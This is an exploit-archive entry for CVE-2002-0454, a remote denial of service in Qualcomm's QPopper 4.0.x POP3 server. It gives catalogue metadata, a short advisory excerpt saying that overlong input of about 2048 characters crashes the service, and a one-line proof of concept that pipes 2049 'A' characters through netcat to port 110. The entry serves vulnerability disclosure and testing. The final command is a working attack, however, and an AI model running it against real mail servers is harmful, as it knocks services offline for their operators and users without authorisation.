Qualcomm QPopper 4.0.x - Remote Denial of Service

Author: Jonas Frey
type: dos
platform: unix
port: 
date_added: 2002-03-15  
date_updated: 2012-09-17  
verified: 1  
codes: CVE-2002-0454;OSVDB-5290  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21345.txt  

source: https://www.securityfocus.com/bid/4295/info

Qualcomm's QPopper is a POP3 mail server for Linux and Unix based systems. Recent versions of QPopper have been released as open source projects.

A vulnerability has been reported in some versions of qpopper. Reportedly, if a string of longer than approximately 2048 characters is sent to the qpopper process, a denial of service condition will occur.

perl -e '{print "A"x"2049"}' | netcat host.com 110